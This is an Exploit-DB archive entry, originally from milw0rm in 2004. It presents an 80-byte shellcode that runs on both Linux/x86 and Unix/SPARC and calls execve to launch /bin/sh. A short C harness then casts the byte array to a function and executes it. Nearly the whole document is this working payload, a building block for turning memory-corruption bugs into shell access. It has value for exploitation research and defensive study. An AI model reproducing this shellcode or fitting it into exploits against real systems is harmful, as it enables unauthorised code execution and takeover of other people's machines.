Linux/x86 / Unix/SPARC - execve(/bin/sh) Shellcode (80 bytes)

EDB-ID:

13468

CVE:

N/A


Platform:

Multiple

Published:

2004-09-12

/*
 *  Linux/x86 and Unix/Sparc
 *
 *   execve() of /bin/sh by dymitri!!!
 *  
 */

#include <stdio.h>

char wcode[]=

        "\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc"
        "\xa2\x14\x63\x68\xe0\x3b\xbf\xf0\xc0\x23\xbf\xf8\x90\x23\xa0\x10"
        "\xc0\x23\xbf\xec\xd0\x23\xbf\xe8\x92\x23\xa0\x18\x94\x22\x80\x0a"
        "\x82\x10\x20\x3b\x91\xd0\x20\x08"
        "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

main()
{
  void (*s)() = (void *)wcode;
  printf("MULtiplataforma: %d\n\n",
      strlen(wcode));
  s();
}

// milw0rm.com [2004-09-12]